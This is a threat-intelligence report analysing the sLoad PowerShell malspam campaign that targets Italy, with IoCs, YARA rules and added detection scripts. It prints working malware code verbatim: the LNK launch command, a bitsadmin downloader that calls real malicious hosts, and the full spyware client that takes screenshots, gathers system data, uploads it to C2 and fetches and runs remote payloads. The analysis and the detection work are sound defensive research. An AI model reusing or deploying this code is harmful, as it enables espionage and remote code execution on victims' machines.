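sLoad PowerShell malspam is spreading to Italy
I. Introduction
Over the past few months, CERT-Yoroi has observed an emerging attack pattern. A series of malicious emails share common techniques that may be linked to a single threat group running a broad campaign against Italian networks. It is not yet clear whether these attempts come from an established cybercrime group that has changed its TTPs or from an entirely new actor, but CERT-Yoroi is tracking the threat under the internal codename “Sload-ITA” (TH-163). Last May, SANS ICS researchers documented similar activity in the United Kingdom. The malicious campaigns share the same drop mode, abusing code-hiding techniques based on compressed archives and similar drop-URL patterns: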
· 2018-10-08 – uses the “/AE-9455933DGW-nota-cliente” URL pattern
· 2018-10-09 – uses the “/fattura-per-cliente-QN-OAYSAPV” URL pattern
· 2018-10-15 – uses the “/MA-47462780Y3-documento-cliente” URL pattern
· Some of the malicious emails were sent from “PEC” mailboxes
· 2018-11-19 – uses “/documento-aggiornato-novembre-ER16909FP9”
· Tracked by CERT-PA
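Yoroi-Cybaze ZLAB collected and analyzed the samples recovered during response operations to uncover the details of the malicious implant used by these attackers. The figure below summarizes the steps of a sLoad malware infection.
Figure 1. sLoad infection flow
II. Technical Analysis
The analyzed malicious samples are compressed zip archives containing two distinct files:
1. A link that pretends to point to a system folder, named “invio fattura elettronica.lnk”
2. A hidden JPEG image, “image_20181119_100714_40.jpg”, stored with the HA attributes.
Although the LNK file extracted from the archive looks harmless, it is weaponized in a way similar to the one adopted by APT29 in its latest operations, which indicates that the technique is part of several malicious arsenals. In fact, when the user double-clicks the file, a batch script spawns the following PowerShell script: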
C:\Windows\System32\cmd.exe /C powershell.exe -nop -eP ByPass -win hi"d"den -c "&{$9oc=get-childItem -path c:\users\* -recurse -force -include documento-aggiornato-novembre-*.zip;$g3u=get-content -LiteralPat $9oc.fullname;$g3u[$g3u.length-1]|iex}"
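The PowerShell script searches for any file matching the pattern “documento-aggiornato-novembre-*.zip”. If the file exists, the script reads it, takes the portion of code at its end (the last line returned by Get-Content) and invokes it through “IEX”. We inspected the zip file and recovered this portion of code. In the figure below, the content of the attached archive is shown in pink and yellow, and the extraneous code in blue.
Figure 2. Code appended to the zip archive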
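A triage check for the trick described above, as an added example that is not part of the original analysis: it parses the ZIP End Of Central Directory record and reports any archive comment or bytes appended after it, which is where a trailing script line would sit. The sample archives and the marker line are constructed and harmless; the function names are hypothetical.

```python
import io
import struct
import zipfile

EOCD_SIG = b"PK\x05\x06"  # End Of Central Directory (EOCD) signature
EOCD_FIXED = 22           # EOCD size without the variable-length comment


def split_after_zip(data: bytes) -> tuple[bytes, bytes]:
    """Return (archive comment, bytes appended after the EOCD record)."""
    pos = data.rfind(EOCD_SIG)
    while pos != -1:
        if pos + EOCD_FIXED <= len(data):
            (comment_len,) = struct.unpack_from("<H", data, pos + 20)
            end = pos + EOCD_FIXED + comment_len
            if end <= len(data):  # plausible EOCD: its comment fits in the file
                return data[pos + EOCD_FIXED:end], data[end:]
        pos = data.rfind(EOCD_SIG, 0, pos)
    raise ValueError("no End Of Central Directory record found")


def triage(data: bytes) -> dict:
    """Report data outside the ZIP structures and its last text line."""
    comment, trailing = split_after_zip(data)
    lines = (trailing or comment).splitlines()
    return {
        "comment_bytes": len(comment),
        "trailing_bytes": len(trailing),
        # Last line of the extra data: what `$g3u[$g3u.length-1] | iex` would run.
        "last_line": lines[-1].decode("latin-1") if lines else "",
        "suspicious": bool(comment or trailing),
    }


def build_sample(appended: bytes = b"") -> bytes:
    """Constructed test archive; the member content is a harmless placeholder."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("invio fattura elettronica.lnk", b"placeholder, not a real LNK")
    return buf.getvalue() + appended


if __name__ == "__main__":
    marker = b"\r\nWrite-Output 'constructed marker line'"
    for name, blob in (("clean", build_sample()), ("appended", build_sample(marker))):
        print(name, triage(blob))
```
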
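This part of the file contains the executable code invoked by the PowerShell script. By calling “bitsadmin.exe”, this code is able to download further scripts from “firetechnicaladvisor.com”, and it then stores all of the newly downloaded files in the “%APPDATA%/<UUID>” folder. The figure below shows the contents of the folder after the malicious implant has been downloaded:
Figure 3. Components of the malicious implant
The snippet below shows the code responsible for downloading the malware.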
$env_appData=$env:appdata;
$cmd='cmd';
$gen_random_value_name_ps= -join ((65..90) + (97..122) | Get-Random -count 14 | % {[char]$_});
$get_uuid=(Get-WmiObject Win32_computerSystemProduct).UUid;
$set_hidden='hidden';
# Staging folder: %APPDATA%\<machine UUID>
$folder_to_store_file = $env_appData+'\'+$get_uuid;
# Marker file "d": exists while the BITS download is still running
$h=$folder_to_store_file+'\d';
if(!(test-path $folder_to_store_file)){
    New-item -itemtype directory -Force -path $folder_to_store_file;
};
$ps_to_download_and_execute='/c echo 1 > '+$h+'& bitsadmin /wrap /transfer fredikasledi /download /priority FOReGrOUnd "https://firetechnicaladvisor.com/globa/monu" '+$folder_to_store_file+'\'+$gen_random_value_name_ps+'.ps1 & del '+$h+' & exit';
start-process -wiNdowstyLe $set_hidden $cmd $ps_to_download_and_execute;
$e=1;
Start-Sleep -s 6;
$p2='powe';
# Wait until the marker file has been deleted, i.e. the download has finished
while($e -eq 1){
    if(test-path $h){
        Start-Sleep -s 3
    }else{
        $e=2
    }
};
Start-Sleep -s 7;
$p1='ell';
# Run the downloaded .ps1 through a hidden cmd window
$ps_to_download_and_execute='/c '+$p2+'rsh'+$p1+' -nop -ep bypass -File '+$folder_to_store_file+'\'+$gen_random_value_name_ps+'.ps1 & exit';
start-process -wiNdowstyLe $set_hidden $cmd $ps_to_download_and_execute;
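The NxPgKLnYEhMjXT.ps1 script installs the implant on the victim's machine and registers a scheduled task on the system to make the infection persistent. The script then deletes itself.
Figure 4. Installation script of the malicious implant
After a quick look at the CxeLtfwc.ps1 script, we also noticed that the malware uses the “Invoke-Expression” cmdlet to load and execute another piece of code from the “config.ini” file.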
param ([string]$k = "");
$random_name_of_powershell=Get-Process -name powershell*;
if ($random_name_of_powershell.length -lt 2){
    $folder_name = (Get-WmiObject Win32_ComputerSystemProduct).UUID ;
    $log = $env:APPDATA+"\"+$folder_name;
    $key=$k -split "," ;
    $Secure= Get-Content $log"\config.ini";
    $Encrypted= ConvertTo-SecureString $Secure -key $key;
    $encrypted_string = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($Encrypted);
    $expression_to_execute = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($encrypted_string);
    Invoke-Expression $expression_to_execute;
}
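The following shows how the other components of the implant invoke this specific code. Note that the script is launched with an input parameter (“1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16”), which serves as the key to decrypt the contents of “config.ini”: the real payload of the malware.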
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden -ep bypass -File C:\Users\admin\AppData\Roaming\42082A54-EE38-CA41-8C45-A16336FBCCD9\CxeLtfwc.ps1 -k 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
--------------
"C:\Users\admin\AppData\Roaming\42082A54-EE38-CA41-8C45-A16336FBCCD9\<RANDOM_NAME>.vbs" 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
--------------
Dim objWmi, colItems, objItem, strUUID, blnValidUUID,oShell
Set objWmi = GetObject("winmgmts:\\" & "." & "\root\cimv2")
Set colItems = objWmi.ExecQuery("Select * from Win32_ComputerSystemProduct")
Set oShell = WScript.CreateObject ("WScript.Shell")
oShell.run "power"+"shel"+"l.exe -win hi"+"dden -ep by"+"pass -Fi"+"le C:\Users\admin\AppData\Roaming\42082A54-EE38-CA41-8C45-A16336FBCCD9\WpaejPkv.ps1 -k "& WScript.Arguments(0),0,True
Set oShell = Nothing
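Both the “config.ini” and “web.ini” files are decrypted and invoked at run time through the following set of system calls:
“ConvertTo-SecureString”,
[System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($Encrypted);
[System.Runtime.InteropServices.Marshal]::PtrToStringAuto($slStr);
The figure below shows part of the encrypted code of the “config.ini” file, followed by its decrypted code.
Figure 5. Encrypted payload in “config.ini”
This is the source code of the malicious client: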
$runDMC = "cmd";
$key=@(1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16)
$morty=$env:APPDATA;
function Get-ScreenCapture{
    Param(
        [Parameter()]
        [Alias("Path")]
        [string]$Directory = ".",
        [Parameter()]
        [ValidateRange(70,100)]
        [int]$Quality,
        [Parameter()]
        [Switch]$AllScreens
    )
    Set-StrictMode -Version 2
    Add-Type -AssemblyName System.Windows.Forms
    if ($AllScreens){
        $Capture = [System.Windows.Forms.Screen]::AllScreens
    }else{
        $Capture = [System.Windows.Forms.Screen]::PrimaryScreen
    }
    foreach ($C in $Capture){
        $screenCapturePathBase = $path+"\ScreenCapture"
        $cc = 0
        while (Test-Path "${screenCapturePathBase}${cc}.jpg") { $cc++ }
        $FileName="${screenCapturePathBase}${cc}.jpg"
        $Bitmap = New-Object System.Drawing.Bitmap($C.Bounds.Width, $C.Bounds.Height)
        $G = [System.Drawing.Graphics]::FromImage($Bitmap)
        $G.CopyFromScreen($C.Bounds.Location, (New-Object System.Drawing.Point(0,0)), $C.Bounds.Size)
        $g.Dispose()
        $Quality=70;
        $EncoderParam = [System.Drawing.Imaging.Encoder]::Quality
        $EncoderParamSet = New-Object System.Drawing.Imaging.EncoderParameters(1)
        $EncoderParamSet.Param[0] = New-Object System.Drawing.Imaging.EncoderParameter($EncoderParam, $Quality)
        $JPGCodec = [System.Drawing.Imaging.ImageCodecInfo]::GetImageEncoders() | Where{$_.MimeType -eq 'image/jpeg'}
        $Bitmap.Save($FileName ,$JPGCodec, $EncoderParamSet)
    }
}
$productID = (Get-WmiObject Win32_ComputerSystemProduct).UUID ;
$path = $morty+"\"+$productID;
$btlog=$path+'\btc.log'
$pp=$path+'\'+$productID;
try{ If(test-path $pp"_0"){ Remove-Item $pp"_*";}}catch{}
try{ If(test-path $pp){Remove-Item $pp;}}catch{}
$ldf='/C bitsadmin /reset';
start-process -wiNdowStylE HiDden $runDMC $ldf;
$Secure= Get-Content $path"\web.ini";
$Encrypted= ConvertTo-SecureString $Secure -key $key;
$slStr = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($Encrypted);
$rStr = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($slStr);
$d=$rStr -split ","
For ($i=0; $i -le $d.Length-1; $i++){
    if ($d[$i] -match "http"){
        $rp= -join ((65..90) + (97..122) | Get-Random -Count 8 | % {[char]$_})
        $ldf='/C bitsadmin /transfer '+$rp+' /download /priority normal "'+$d[$i]+'/captcha.php?ch=1" '+$path+'\'+$productID+'_'+$i;
        start-process -wiNdowStylE HiDden $runDMC $ldf;
    }
}
$e=1;$dd=0;
while($e -eq 1){
    $ad=2;
    For ($i=0; $i -le $d.Length-1; $i++){
        $pp=$path+'\'+$productID+'_'+$i;
        if([System.IO.File]::Exists($pp)){
            $line=Get-Content $pp
            if ($line -eq "sok"){ $did=$i;}
            $ad=1;
        }
    }
    $dd++;
    if ($dd -gt 60) {
        $outU="";
        For ($i=0; $i -le $d.Length-1; $i++){
            if ($d[$i] -match "http"){
                $l=$d[$i].split(".")[0] -replace "[^0-9]" , '';
                $p=$d[$i].split(".")[1] -replace "[^A-Z/]" , '';
                $n=[int]$l+1;
                $r1=$l+'.'+$p;
                if ($n -gt 50){ $n=1;}
                $r2=[string]$n+'.'+$p;
                $outU+=$d[$i]+"," -replace $r1, $r2
            }
        }
        $Secure = ConvertTo-SecureString $outU -AsPlainText -Force
        $Encrypted = ConvertFrom-SecureString -SecureString $Secure -key $key
        $Encrypted | out-file $path"\web.ini";
        stop-process -name powershell*
    }
    if ($ad -eq 1){ $e=2;}
    Start-Sleep -s 3
}
$rp= -join ((65..90) + (97..122) | Get-Random -Count 12 | % {[char]$_})
$ldf='/C bitsadmin /transfer '+$rp+' /download /priority FOREGROUND "'+$d[$did]+'new/u.jpg" "'+$path+'\web.ini" & exit ';
$ldf | out-file $path'\asd'
start-process -wiNdowStylE HiDden $runDMC $ldf;
$outD="";
$dd=Get-WmiObject -Class Win32_LogicalDisk | Where-Object {$_.Description -match 'Network'} | Select-Object ProviderName,DeviceID;
try{ if ($dd ){for ($i=0; $i -le $dd.length; $i++){$outD=$outD+'{'+$dd[$i].DeviceID+''+$dd[$i].ProviderName+'}';}} }catch {}
try{ if ($dd -and $outD -eq "" ){$outD='{'+$dd[$i].DeviceID+''+$dd.ProviderName+'}';}}catch {}
try{
    $nw=$path+'\_nw';
    $nr=$path+'\_nr';
    $rf='/C net view> '+$nw+' & copy '+$nw+' '+$nr+' & exit';
    start-process -wiNdowStylE HiDden cmd $rf;
    $e=1;while($e -eq 1){If(test-path $nr){$e=3;}Start-Sleep -s 3;}
    $l=get-content $nr;
    $gk=$l -match '\\';
    if ($gk -and $gk.length -gt 1){
        $outD=$outD+'{in network:'+$gk.length+'}';
    }
    remove-item $nr
}catch{}
$cp=Get-WmiObject win32_processor | select Name;
try{ if ($cp.length -gt 0){ $cpu=$cp[0].Name }else{$cpu=$cp.Name} }catch {}
try{$v1=(gwmi win32_operatingsystem).caption }catch {}
try{ Remove-Item $path"\*.jpg";}catch{}
try{
    if([System.IO.File]::Exists($path+"\f.ini")){
        $ci=Get-Content $path"\f.ini";
    }else{
        $ci=0;
        for ($i=0;$i -le 3;$i++){
            Get-ScreenCapture;
            Start-Sleep -s 40;
        }
        $cit=Get-ChildItem -Path c:\users -Filter *.ICA -Recurse -ErrorAction SilentlyContinue -Force
        if ($cit){ $ci=1; }
        $ci | Out-File $path"\f.ini"
    }
}catch{}
if (test-path $path"\..\Microsoft\Outlook\"){$ot=1;}else{$ot=0;}
try {$lnk=([System.Uri]$d[$did]).Host}catch{}
$s=0;
while($true){
    $out="";
    $tt=Get-Process| Select-Object name
    for ($i=0; $i -le $tt.length-1; $i++){
        $out=$out+"*"+$tt[$i].Name;
    }
    $rp= -join ((65..90) + (97..122) | Get-Random -Count 12 | % {[char]$_})
    $ldf='/C bitsadmin /transfer '+$rp+' /download /priority FOREGROUND "'+$d[$did]+'captcha.php?lnk='+$lnk+'&s='+$s+'&g=pu&c='+$ci+'&id='+$productID+'&v='+$v1+'&c='+$rp+'&a='+$out+'&d='+$outD+'&n='+$env:ComputerName+'&cpu='+$cpu+'&o='+$ot+'" '+$path+'\'+$productID+' > '+$btlog+' & exit ';
    start-process -wiNdowStylE HiDden $runDMC $ldf;
    Start-Sleep -s 120;
    $pp=$path+'\'+$productID;
    if([System.IO.File]::Exists($pp)){
        $line=Get-Content $pp;
        if ($line -match "run="){
            $u=$line -replace 'run=','';
            $ldf="/C powershell.exe -command iex ((nEw-ObJect ('NEt.WeBclient')).('DowNLoAdStrInG').invoKe(('"+$u+"')))";
            start-process -wiNdowStylE HiDden $runDMC $ldf;
        }elseif ($line.length -gt 3){
            try{ Remove-Item $path"\*.jpg";}catch{}
            $dPath = [Environment]::GetFolderPath("MyDocuments")
            $rp= -join ((65..90) + (97..122) | Get-Random -Count 16 | % {[char]$_})
            $ldf='/C bitsadmin /transfer '+$rp+' /download /priority FOREGROUND '+$line+' '+$path+'\'+$productID+'_'+$rp+'.txt & Copy /Z '+$path+'\'+$productID+'_'+$rp+'.txt '+$path+'\'+$productID+'_'+$rp+'_1.txt & certutil -decode '+$path+'\'+$productID+'_'+$rp+'_1.txt '+$dPath+'\'+$productID+'_'+$rp+'.exe & powershell -command "start-process '+$dPath+'\'+$productID+'_'+$rp+'.exe" & bitsadmin /transfer '+$rp+'s /download /priority normal "'+$d[$did]+'gate.php?n='+$env:ComputerName+'&ts=1&id='+$productID+'&c='+$rp+'" '+$path+'\'+$productID+'_'+$rp+'.txt & exit';
            start-process -wiNdowStylE HiDden $runDMC $ldf;
            for ($i=0;$i -le 5;$i++){
                Get-ScreenCapture;
                Start-Sleep -s 40;
            }
            $ldf='/C del '+$path+'\'+$productID+'_'+$rp+'.txt & del '+$path+'\'+$productID+'_'+$rp+'_1.txt & del '+$dPath+'\'+$productID+'_'+$rp+'.exe & exit';
            start-process -wiNdowStylE HiDden $runDMC $ldf;
        }
    }
    for ($i=0; $i -le 5; $i++){
        $scr=$path+"\ScreenCapture"+$i+".jpg"
        if([System.IO.File]::Exists($scr)){
            $rur= -join ((65..90) + (97..122) | Get-Random -Count 16 | % {[char]$_});
            $rf='/C bitsadmin /transfer '+$rur+' /upload /priority FOREGROUND "'+$d[$did]+'p.php?n='+$env:ComputerName+'&id='+$productID+'&i='+$i+'&s='+$rur+'" "'+$scr+'" & del "'+$scr+'" & exit';
            start-process -wiNdowStylE HiDden $runDMC $rf;
        }
    }
    if([System.IO.File]::Exists($btlog)){
        $e=0;
        foreach($line in Get-Content $btlog -Encoding UTF8) {
            if ($line -match "ERROR"){ $e++; }
        }
        if ($e -gt 0 ){
            $rf='/C bitsadmin /reset & exit';
            start-process -wiNdowStylE HiDden $runDMC $rf;
            stop-process -name powershell*
        }
    }
    Start-Sleep -s 1200;
    $s++;
}
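Decrypting the contents of “web.ini” reveals the remote addresses of the C2 used by the malicious implant: https://hamofgri.me/images/, https://ljfumm.me/images/
The malicious client collects information about the victim's computer, such as: domain, DNS cache, running processes, IP and system architecture. In addition, it periodically captures screenshots of the victim's current desktop, searches for the Microsoft Outlook folder, and collects information on whether “*.ICA” Citrix files exist in the user directory. All of this information is sent to the command-and-control server. After submitting the data, it receives further PowerShell code directly from the attacker. This behavior is characteristic of trojan/spyware malware, which is often used as a beachhead for reconnaissance of the compromised host, or even as the initial stage of a more complex attack.
Figure 6. VT scores for the sLoad malicious components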
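The command lines shown in the listings above lend themselves to process-creation hunting. The following is an added example, not part of the original analysis: a small rule set that flags the UUID-named staging folder, the “-k” key argument, BITS jobs writing into that folder, and the captcha.php / gate.php / p.php endpoints carrying the machine UUID. The rule names, the c2.example host and the sample lines are constructed for illustration; paths containing spaces are not handled.

```python
import re

UUID = r"[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}"
STAGE_DIR = r"\\AppData\\Roaming\\" + UUID + r"\\"  # %APPDATA%\<machine UUID>\

RULES = {
    # powershell -File <staging folder>\*.ps1 -k <comma-separated key bytes>
    "ps1_with_key": re.compile(
        r"-File\s+\S*" + STAGE_DIR + r"\S+\.ps1\s+-k\s+\d+(?:,\d+)+", re.I),
    # bitsadmin job whose local file lives in the staging folder
    "bits_to_stage_dir": re.compile(
        r"bitsadmin\b.*?/transfer\b.*" + STAGE_DIR, re.I),
    # beacon, tasking or upload endpoint carrying the machine UUID
    "c2_endpoint": re.compile(
        r"/(?:captcha|gate|p)\.php\?\S*\bid=" + UUID, re.I),
    # downloaded text decoded into an executable
    "certutil_decode_exe": re.compile(
        r"certutil\s+-decode\s+\S+\.txt\s+\S+\.exe", re.I),
}


def match_rules(command_line: str) -> list[str]:
    """Return the names of all rules that fire on one command line."""
    return [name for name, rx in RULES.items() if rx.search(command_line)]


# Constructed process-creation command lines modelled on the listings above.
MACHINE = "42082A54-EE38-CA41-8C45-A16336FBCCD9"
STAGE = r"C:\Users\admin\AppData\Roaming" + "\\" + MACHINE
DEST = STAGE + "\\" + MACHINE
SAMPLES = [
    rf"powershell.exe -win hidden -ep bypass -File {STAGE}\CxeLtfwc.ps1 "
    r"-k 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16",
    rf'cmd /C bitsadmin /transfer AbCdEfGh /download /priority normal '
    rf'"https://c2.example/images/captcha.php?ch=1" {DEST}_0',
    rf'cmd /C bitsadmin /transfer QwErTyUiOpAs /download /priority FOREGROUND '
    rf'"https://c2.example/images/captcha.php?lnk=c2.example&s=0&g=pu&c=0'
    rf'&id={MACHINE}&n=HOST01" {DEST} > {STAGE}\btc.log & exit',
    r"powershell.exe -File C:\Scripts\backup.ps1 -k 5",            # benign
    r"bitsadmin /transfer job1 /download https://updates.example/pkg.cab C:\Temp\pkg.cab",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(match_rules(line), "<-", line[:60])
```
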
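III. Conclusion
The recent wave of sLoad attacks reported by third-party security firms and government CERTs poses a significant threat to Italian networks, because the attackers prepare carefully crafted phishing email themes, and the techniques and methods used to install the malware implant have a low detection rate.
It is still unclear whether the group behind these attacks is an entirely new player in cybercrime. The initial malicious campaign was discovered in May 2018 and targeted users in the United Kingdom. The more recent activity against Italian users began last October, which indicates that the group has expanded its malicious operations.
CERT-Yoroi is currently tracking TH-163 in the Italian region, and the ZLAB team continuously analyzes its components, malware implants and techniques to ensure the protection of our country.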
IoC
Malicious URLs:
C2 (sload):
Persistence:
· %APPDATA%\<GUID>
Hash:
Yara rules
rule image_20181119_100714_50_jpg{
    meta:
        description = "Yara Rule for Trojan/sLoad"
        author = "Cybaze Zlab_Yoroi"
        last_updated = "2018-11-21"
        tlp = "white"
        category = "informational"
    strings:
        $a1 = "Adobe Photoshop"
        $a2 = {3A 30 33 3A 32 38}
        $a3 = {FF D8 FF E0}
        $b = {B4 30 B8 B? ?? ?? ?? BA AD E3 ?? ?? C7 7F 84 6A 09 74 9F 75}
    condition:
        $a1 and $a2 and $a3 or $b
}

rule documento_aggiornato_novembre_ER16909FP9_zip{
    meta:
        description = "Yara Rule for Trojan/sLoad"
        author = "Cybaze Zlab_Yoroi"
        last_updated = "2018-11-21"
        tlp = "white"
        category = "informational"
    strings:
        $a1 = "https://firetechnicaladvisor.com/"
        $a2 = {24 34 4D 61 30 58 32 6C 49 7A}
        $a3 = "image_20181119_100714_40.jpg"
        $a4 = "invio fattura elettronica.lnk"
        $a5 = {2B 27 2E 70 73 31}
        $b = {50 4B}
    condition:
        1 of ($a*) and $b
}

rule _ini_files{
    meta:
        description = "Yara Rule for Trojan/sLoad"
        author = "Cybaze Zlab_Yoroi"
        last_updated = "2018-11-21"
        tlp = "white"
        category = "informational"
    strings:
        $a1 = "DkAYQBjADcANAA3ADUAMwBkADAA"
        $a2 = "ADMAMgA5AGUAYgA3AGYAM"
    condition:
        $a1 or $a2
}

rule invio_fattura_elettronica_lnk{
    meta:
        description = "Yara Rule for Trojan/sLoad"
        author = "Cybaze Zlab_Yoroi"
        last_updated = "2018-11-21"
        tlp = "white"
        category = "informational"
    strings:
        $a1 = {63 00 3A 00 5C 00 75 00 73 00 65 00 72 00 73 00 5C 00 2A}
        $a2 = {4D 5A 35 10 00 53 79 73 74 65 6D 33 32}
        $b = {4C ??}
        $c = {63 6D 64 2E 65 78 65}
        $d = "i.e.x."
    condition:
        1 of ($a*) and $b and $c and $d
}